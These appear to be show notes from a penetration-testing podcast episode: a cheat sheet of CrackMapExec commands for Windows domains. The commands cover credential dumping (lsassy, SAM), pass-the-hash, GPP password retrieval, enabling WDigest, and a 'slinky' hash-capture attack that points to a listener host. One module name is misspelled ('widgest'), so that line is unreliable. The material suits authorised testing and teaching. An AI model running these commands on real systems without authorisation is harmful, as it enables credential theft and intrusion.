7MS #562: Cracking and Mapping and Execing with CrackMapExec
1 min read Podcast, Pentesting

7MS #562: Cracking and Mapping and Execing with CrackMapExec

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass

# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler

# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac

# Find GP passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

# Get list of targets with smb signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable

# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy

# Do pass the hash attacks
cme smb x.x.x.x -u username -H HASH

# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam

# Enumerate SMB shares
cme smb x.x.x.x -u username -p pass --shares

# Conduct slinky attack: 
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE

You might also like...

Jan
19

7MS #607: How to Succeed in Business Without Really Crying - Part 15

1 min read
Jan
12

7MS #606: Hacking OWASP Juice Shop (2024 edition)

1 min read
Jan
05

7MS #605: Navigating the Demands of Tech Leadership with Amanda Berlin of Blumira

1 min read
Jan
01

7MS #604: A Two Tool Teaser

1 min read
Dec
24

7MS #603: Monitoring Your Tailscale Network with Uptime Kuma

1 min read

Popular tags

Podcast Pentesting interviews blue team diy